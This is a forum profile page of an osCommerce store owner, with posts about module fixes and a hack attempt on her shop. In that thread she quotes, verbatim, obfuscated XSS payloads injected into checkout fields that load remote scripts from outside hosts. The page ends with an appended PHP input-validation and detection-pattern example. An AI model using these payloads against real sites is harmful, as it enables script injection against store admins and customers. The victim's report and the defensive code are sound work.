puggybelle

Members
  • Content count

    1,037

About puggybelle

  • Birthday 08/02/1966

Profile Information

  • Real Name
    Andrea
  • Gender
    Female
  • Location
    Central North Carolina

Recent Profile Visitors

11,426 profile views
  1. puggybelle

    Hack attempt - is there a way to prevent this?

    Okay, here's where I'm at. Webhost scanned the database and found three similar patterns of jb.gy in the sessions table and removed them. No new files had been added to the website. And just encouragement to upgrade my installation to the 'frozen' version, I think it's called. And that's what I thought I had! Oh, well. Work to do but it didn't turn out to be a disaster. Think I will give View Counter another look, though... If I have to block half the world, I'll do it! Thanks everybody! - Andrea
  2. puggybelle

    Hack attempt - is there a way to prevent this?

    They checked out using the checks/money order selection so no worries about payment or delivery. And I sincerely hope that this is a one-off thing and all will be well. I have contacted my webhost with full details and am awaiting a response now. Other orders have come thru fine, so I'm hopeful that deleting the order is the end of it. This crap is really scary, you know? Well, I'm sure the webhost knows more than I do about these things, so...I've put it all in their lap now. I haven't the faintest idea how to go about manually cleaning the database. Hopefully, they'll find nothing and I can forget about it. My host does NOT offer country blocking. I had View Counter installed for a brief time, back when I had SEO-G urls running, but there was some conflict and I ended up uninstalling View Counter. In retrospect, it should have been the other way around. I now use Ultimate SEO URLs. Live and learn, I guess. I'll post back with any response I get from the webhost. Hopefully, everything is okay. Thanks all! - Andrea
  3. puggybelle

    Hack attempt - is there a way to prevent this?

    @ArtcoInc Well, this is just a mess! My core code has been modified substantially, so...I have a lot to think about now. But, Thank You for helping!

    @Jack_mcs Upon viewing the order process email that bounced back after this hack attempt, I see a huge chunk of malicious code that was inserted in the text section of the order form. The part where buyers can add any additional comments with their purchase. But, the < > tags have been stripped. Looks like this:

        _/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_ _/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fjb.gy%2Fi%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_

    It'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that. I bet someone in this forum knows... I will take comfort in knowing that the code is being sanitized and just leave it at that. This hacker nonsense is crazy and worse than ever. Thanks to everyone who posted - I appreciate it very much! - Andrea
  4. puggybelle

    Hack attempt - is there a way to prevent this?

    Is there anything I need to do? When I run Version Checker in Admin, it comes back with: - Andrea
  5. puggybelle

    Hack attempt - is there a way to prevent this?

    @ArtcoInc I downloaded a package that is dated May 24, 2018 called Responsive - osCommerce - master - Andrea
  6. puggybelle

    Hack attempt - is there a way to prevent this?

    I always forget to say which version I'm using. I'm using 2.3.4.1 CE with the latest version of PWA. - Andrea
  7. puggybelle

    Hack attempt - is there a way to prevent this?

    Can you be a little more specific? I deleted the order - no account existed. I found some interesting info online when searching a bit deeper. The name has been reported numerous times from other websites seeing injection code in the name and address fields, and some ending up on the receiving end of credit card fraud. Google the phrase Linda Juan Fraud and see what comes up. Guess it was just my turn! Hope they send cash... - Andrea
  8. Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually):

        Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC
        244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_
        Ithaca
        Ithaca, New York 98765
        United States

    I've changed the name and address for this post as the street address, city, state and zip code they provided is legit. They checked out using the Checks/Money Order method - no account was created or ever existed for this buyer's name. The order process email it generated bounced back to me as undeliverable:

        A message that you sent contained one or more recipient addresses that were incorrectly constructed:
        "Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC" <bobsmith987@hotmail.com>: unmatched doublequote in local part (expected word or "<")
        This address has been ignored. There were no other addresses in your message, and so no attempt at delivery was possible.

    Is there a way to prevent that? Stop someone from proceeding when adding garbage in the name and address fields? And...can someone tell me what it is they're trying to accomplish by doing this? Thanks! - Andrea
  9. Function keys section at the bottom of Includes > Modules > Content > Product_Info > cm_pi_date_available.php is missing an entry for Available Style in the Date Available module. 'MODULE_CONTENT_PI_DATE_AVAILABLE_STYLE',
  10. Hi Zahid, Should I just provide a link to the thread I created above or write a brand new post in that one? Looks like it's still active, last post dated November 29th. - Andrea
  11. Stumbled on a file that appears to be missing a line of code.

    Catalog > Includes > Modules > Content > Product_Info > cm_pi_date_available.php

    Bottom of the file reads:

        function keys() {
          return array('MODULE_CONTENT_PI_DATE_AVAILABLE_STATUS', 'MODULE_CONTENT_PI_DATE_AVAILABLE_CONTENT_WIDTH', 'MODULE_CONTENT_PI_DATE_AVAILABLE_SORT_ORDER');
        }

    It's missing the entry for Available Style, which controls the appearance of the date format. Should look like this:

        // configuration keys this module registers, including the style setting
        function keys() {
          return array('MODULE_CONTENT_PI_DATE_AVAILABLE_STATUS', 'MODULE_CONTENT_PI_DATE_AVAILABLE_CONTENT_WIDTH', 'MODULE_CONTENT_PI_DATE_AVAILABLE_STYLE', 'MODULE_CONTENT_PI_DATE_AVAILABLE_SORT_ORDER');
        }

    I stumbled on it after trying to figure out how to change the date format that was being output on my products. I don't know who is responsible for maintaining the downloads of osCommerce, but I thought I should pass this on so it can be corrected. Makes life a little easier when setting up the module. - Andrea
  12. Sorry...make that includes/modules/new_products.php - Andrea
  13. I've searched for help with this and saw several people asking for help with it over the years, but no replies. At present, if I put an item on sale...only the sale price will appear in the New Products module on the homepage. I'd like it to appear as it does in the Specials box....original price, with a strike thru it, followed by the new sale price in red. Tried several things in includes/modules/products_new.php but nothing I do is working out. Can someone point me in the right direction, please? - Andrea
  14. @Jack_mcs I'm sorry. This is what happens when posting late at night. I have a question about the Reset SEO URLs Cache feature. Is that something that should be done every so often or only when you have a problem? I remember installing this and some things were not working and when I did that, it cleared up all of my trouble immediately. Should I use that feature on a regular basis or let it sit? Thank You! - Andrea
  15. @Jack_mcs I don't believe there was a wonky character in the title. All of my titles are the same, in the way they're formatted. Just numbers and text. I'm going to hope that it was one of those crap moments I experienced with my webhost until they put me on a different server when I raised hell. My item descriptions that I migrated over from 2.2 were loaded with css code that was killing the extra description from appearing when browsing by category. I've been manually editing and stripping that code for a couple of months now, one item at a time in Admin. Got thru 100 or so today. It's ongoing. I'm clicking around fast and furious and I haven't run into it again, so...I just have to hope it was one of those abrupt disconnects in the past that may have somehow whacked that item. I'll never know and that blows. Hope I don't see anymore of it. Thanks for the explanation of the uninstall. I took that entry literally...like, UNINSTALL. WIPE IT OUT. And start over if you wish to have it. Oh, well. It's a great tool and I'm glad to have it! - Andrea
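
Added example, not part of puggybelle's posts and not osCommerce code: for the question in the "Hack attempt" posts above about stopping garbage in the name and address fields, a PHP allow-list check for checkout contact fields, output encoding for the admin view, and a marker check for rows already stored. The function names, the allowed character set and the 64-character limit are assumptions.

```php
<?php
// Added example; function names are hypothetical, not osCommerce APIs.

// Allow-list for name/street/city fields: letters, marks, digits, space and
// a few punctuation characters. Quotes, angle brackets, '/', '=' and '_' fail.
// The character set and the 64-character limit are assumptions to tune.
function is_plausible_contact_field(string $value): bool
{
    return preg_match('/\A[\p{L}\p{M}\p{N} .,\'#&-]{1,64}\z/u', trim($value)) === 1;
}

// Encode on output as well, so a value that predates the check is rendered
// as text in the admin order view instead of as markup.
function html_out(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Review helper for rows already stored: flags script tags and inline event
// handlers even after '<' and '>' were replaced with '_'.
function has_injection_marker(string $value): bool
{
    return preg_match('/script|\bon[a-z]+\s*=|\bsrc\s*=/i', $value) === 1;
}

// Constructed sample inputs; the second is the stored form quoted in the post.
$samples = [
    "Bob Smith",
    'Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC',
    "244 Whatever St",
    "Anne-Marie O'Neil",
];

foreach ($samples as $s) {
    printf(
        "%-40s accept=%-3s marker=%-3s html=%s\n",
        $s,
        is_plausible_contact_field($s) ? 'yes' : 'no',
        has_injection_marker($s) ? 'yes' : 'no',
        html_out($s)
    );
}
```

Rejecting `"` in the name also keeps it out of the recipient display name, which is what the bounce message in post 8 reported as an unmatched doublequote.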